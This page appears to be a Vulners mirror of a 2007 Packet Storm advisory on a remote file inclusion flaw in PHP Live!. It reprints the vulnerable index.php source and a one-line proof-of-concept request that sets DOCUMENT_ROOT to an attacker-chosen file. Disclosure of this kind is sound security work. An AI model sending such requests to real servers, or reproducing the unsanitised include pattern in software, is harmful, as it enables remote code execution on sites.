Lucene search
K

phplive-rfi.txt

🗓️ 25 Oct 2007 00:00:00Reported by OutlawType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

This is a PHP Live source code file with a remote file inclusion vulnerabilit

Code
`________________________________  
  
Aria-Security Team  
http://Aria-Security.Net  
Persian Security Network  
________________________________  
  
Source Code:  
  
<?  
/*******************************************************  
* COPYRIGHT OSI CODES - PHP Live!  
*******************************************************/  
session_start() ;  
$l = "" ;  
// try to get cookie value first  
if ( isset( $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ) ) { $l = $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ; }  
if ( isset( $HTTP_GET_VARS['l'] ) ) { $l = $HTTP_GET_VARS['l'] ; }  
if ( isset( $HTTP_POST_VARS['l'] ) ) { $l = $HTTP_POST_VARS['l'] ; }  
  
if ( !file_exists( "./web/conf-init.php" ) )  
{  
HEADER( "location: setup/index.php" ) ;  
exit ;  
}  
include_once("./web/conf-init.php") ;  
if ( file_exists( "web/$l/$l-conf-init.php" ) && $l )  
include_once("./web/$l/$l-conf-init.php") ;  
include_once("$DOCUMENT_ROOT/API/Util_Error.php") ;  
include_once("$DOCUMENT_ROOT/system.php") ;  
include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;  
include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ;  
include_once("$DOCUMENT_ROOT/API/Util_CleanFiles.php") ;  
include_once("$DOCUMENT_ROOT/API/sql.php" ) ;  
include_once("$DOCUMENT_ROOT/API/Users/get.php") ;  
include_once("$DOCUMENT_ROOT/API/Users/update.php") ;  
include_once("$DOCUMENT_ROOT/API/Chat/remove.php") ;  
include_once("$DOCUMENT_ROOT/API/ASP/get.php") ;  
?>  
  
Affected file: Index.php  
Poc:  
/index.php?DOCUMENT_ROOT=file.txt ?  
Credits: Aria-Security  
The-0utl4w  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Oct 2007 00:00Current
7.4High risk
Vulners AI Score7.4
29